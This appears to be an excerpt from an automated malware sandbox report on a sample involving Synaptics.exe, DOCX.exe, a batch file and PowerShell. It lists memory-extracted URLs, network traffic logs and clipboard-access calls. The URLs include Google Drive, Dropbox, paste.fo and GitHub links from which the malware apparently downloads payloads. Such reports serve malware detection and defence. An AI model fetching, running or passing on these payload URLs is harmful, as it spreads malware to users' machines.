Source: Synaptics.exe, 00000032.00000002.2029741758.000000000563A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadVB3
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadVersi
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWr6
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadYs$
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadYu7
Source: Synaptics.exe, 00000032.00000002.2029741758.000000000563A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_
Source: Synaptics.exe, 00000032.00000002.2029741758.000000000563A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada-arcvH
Source: Synaptics.exe, 00000032.00000002.2029741758.0000000005673000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadb-Dx
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadbH
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduser
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcI
Source: Synaptics.exe, 00000032.00000002.2029741758.000000000563A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcale
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadch-ua1s
Source: Synaptics.exe, 00000032.00000002.2029741758.000000000563A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000032.00000002.2029741758.00000000056AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd
Source: Synaptics.exe, 00000032.00000002.2029741758.00000000056FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddth:3
Source: Synaptics.exe, 00000032.00000002.2029741758.000000000563A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade:
Source: Synaptics.exe, 00000032.00000002.2029741758.000000000563A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeFig
Source: Synaptics.exe, 00000032.00000002.2029741758.00000000056FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadec-CHZ
Source: Synaptics.exe, 00000032.00000002.2029741758.00000000056FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadec-CHo
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadenetleniyor...
Source: Synaptics.exe, 00000032.00000002.2029741758.00000000056FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeporty
Source: Synaptics.exe, 00000032.00000002.2029741758.000000000563A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaderve
Source: Synaptics.exe, 00000032.00000002.2029741758.000000000563A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadf.
Source: Synaptics.exe, 00000032.00000002.2029741758.00000000056FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgth:
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000032.00000002.2029741758.00000000056AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhIT
Source: Synaptics.exe, 00000032.00000002.2029741758.00000000056FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadimag
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadion0
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadipt
Source: Synaptics.exe, 00000032.00000002.2029741758.00000000056FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadir=l
Source: Synaptics.exe, 00000032.00000002.2029741758.000000000563A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadkgro
Source: Synaptics.exe, 00000032.00000002.2029741758.000000000563A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000032.00000002.2029741758.00000000056AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadl
Source: Synaptics.exe, 00000032.00000002.2029741758.00000000056FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlatfoU
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadln
Source: Synaptics.exe, 00000032.00000002.2029741758.0000000005673000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlx
Source: Synaptics.exe, 00000032.00000002.2029741758.000000000563A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmax-width:390px;min-height
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmx
Source: Synaptics.exe, 00000032.00000002.2029741758.00000000056FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnd:#f
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnetle
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadns
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnt
Source: Synaptics.exe, 00000032.00000002.2029741758.000000000563A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador...CH
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadort=d
Source: Synaptics.exe, 00000032.00000002.2029741758.0000000005673000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadort=downloadn
Source: Synaptics.exe, 00000032.00000002.2029741758.00000000056AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpPh
Source: Synaptics.exe, 00000032.00000002.2029741758.00000000056FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpadding-right:0
Source: Synaptics.exe, 00000032.00000002.2029741758.00000000056FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadport
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpp
Source: Synaptics.exe, 00000032.00000002.2029741758.000000000563A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadqt
Source: Synaptics.exe, 00000032.00000002.2029741758.000000000563A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr
Source: Synaptics.exe, 00000032.00000002.2029741758.00000000056FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrflo
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadri
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadriveU
Source: Synaptics.exe, 00000032.00000002.2029741758.00000000056FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsafQs
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadss
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt-revC
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadth
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtop
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu
Source: Synaptics.exe, 00000032.00000002.2029741758.000000000563A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduB
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduZVk&
Source: Synaptics.exe, 00000032.00000002.2029741758.00000000056FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadua-wo
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduu
Source: Synaptics.exe, 00000032.00000002.2029741758.00000000056AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadxC
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadxn
Source: Synaptics.exe, 00000032.00000002.2029741758.0000000005673000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadxx
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadysam
Source: DOCX.exe, 0000002A.00000003.1703137796.0000000002290000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloX
Source: DOCX.exe, 0000002A.00000003.1703137796.0000000002290000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloXO
Source: DOCX.exe.38.dr	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
Source: Synaptics.exe, 00000032.00000002.2026306685.00000000021B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloadN
Source: Synaptics.exe, 00000032.00000002.2024268734.00000000007DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIqD
Source: Synaptics.exe, 00000032.00000002.2029741758.00000000056FF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000032.00000002.2029741758.000000000563A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/d
Source: Synaptics.exe, 00000032.00000002.2029741758.00000000056FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsM
Source: Synaptics.exe, 00000032.00000002.2029741758.000000000562A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
Source: Synaptics.exe, 00000032.00000002.2029741758.000000000563A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE6W
Source: Synaptics.exe, 00000032.00000002.2044374629.00000000078FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadS
Source: Synaptics.exe, 00000032.00000002.2029741758.000000000563A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmVE
Source: Synaptics.exe, 00000032.00000002.2024268734.0000000000830000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadwow64=
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/dyg
Source: edb.log.19.dr, qmgr.db.19.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
Source: svchost.exe, 00000013.00000003.1365572830.000001C9791D0000.00000004.00000800.00020000.00000000.sdmp, edb.log.19.dr, qmgr.db.19.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
Source: powershell.exe, 00000009.00000002.1313399256.000001FB04C04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000009.00000002.1313399256.000001FB03FB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000009.00000002.1313399256.000001FB04C5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1333368289.000001FB133F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1333368289.000001FB13539000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000009.00000002.1313399256.000001FB04A00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000009.00000002.1313399256.000001FB04A00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX
Source: powershell.exe, 00000009.00000002.1313399256.000001FB049AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1313399256.000001FB046D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://paste.fo
Source: powershell.exe, 00000009.00000002.1313399256.000001FB03381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1337187359.000001FB1B990000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1313050043.000001FB01950000.00000004.00000020.00020000.00000000.sdmp, Supplier.bat	String found in binary or memory: https://paste.fo/raw/cdfd23f3b9ad
Source: Supplier.bat	String found in binary or memory: https://raw.githubuserc
Source: Supplier.bat	String found in binary or memory: https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/7z2408-x64.exe&
Source: DOCX.exe, 0000002A.00000003.1703137796.0000000002290000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=
Source: DOCX.exe.38.dr	String found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
Source: Synaptics.exe, 00000032.00000002.2026306685.00000000021B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:
Source: DOCX.exe, 0000002A.00000003.1703137796.0000000002290000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl$
Source: DOCX.exe.38.dr	String found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
Source: Synaptics.exe, 00000032.00000002.2026306685.00000000021B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16
Source: DOCX.exe.38.dr	String found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
Source: Synaptics.exe, 00000032.00000002.2026306685.00000000021B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:

Source: unknown	Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50017
Source: unknown	Network traffic detected: HTTP traffic on port 50017 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50007 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50032 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown	Network traffic detected: HTTP traffic on port 50026 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50022 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50003 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50029
Source: unknown	Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50010 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50008 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50021
Source: unknown	Network traffic detected: HTTP traffic on port 50018 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50023
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown	Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50025
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50024
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50026
Source: unknown	Network traffic detected: HTTP traffic on port 50025 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50021 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50030
Source: unknown	Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50029 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 49999 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50009 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50015 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50032
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50033
Source: unknown	Network traffic detected: HTTP traffic on port 50024 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49992 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49999
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49998
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50007
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown	Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50009
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50008
Source: unknown	Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown	Network traffic detected: HTTP traffic on port 50033 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50003
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown	Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50027 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50030 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50006 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50023 -> 443

Source: unknown	HTTPS traffic detected: 172.67.144.225:443 -> 192.168.2.10:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.10:49992 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.10:49991 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.10:49999 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.10:49998 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.10:50003 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.10:50002 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.10:50015 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.10:50022 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.10:50025 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.10:50029 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.10:50032 version: TLS 1.2

Source: C:\Users\user\Desktop\._cache_DOCX.exe

Code function: 46_2_006E7099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

46_2_006E7099

Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006E7294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		46_2_006E7294
